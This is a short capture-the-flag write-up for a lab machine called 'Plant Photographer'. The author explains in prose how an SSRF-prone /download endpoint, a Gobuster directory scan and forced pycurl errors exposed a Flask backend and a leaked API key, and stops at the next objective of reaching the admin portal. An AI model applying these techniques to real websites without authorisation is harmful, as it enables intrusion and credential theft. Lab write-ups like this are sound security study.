search

Plant Photographer

  • I enumerated the website and found a Download Resume button on the homepage.

  • I viewed the source code of the website.

  • The Download Resume button was calling a /download API endpoint to fetch the file. I could use this to carry out an SSRF attack on the target.

  • I tried using a custom script hosted on my machine via SSRF but failed to do so. I tinkered around with the endpoint and triggered error messages to learn more about the infrastructure being used in the backend.

  • While I was conducting manual enumeration Gobuster was running a directory scan on the target. The following subdirectories were found.

  • The admin page gave the following error.

  • The console page was locked behind a PIN.

  • I viewed it's page source and found the following.

  • I didn't really understand it's significance here and whether it could be of any use to me but I still took note of it.

  • Next I kept working the /download endpoint and triggered a pycurl error by modifying the port to an invalid value.

  • This revealed that the website was running Python's Flask framework in the backend. I looked through the errors and found the following

  • The API Key was left in the open and hence the first flag was obtained. This was easy.

  • The next objective was to gain access to the admin portal.

PreviousDaily BugleNextIndustrial Intrusion CTF

Last updated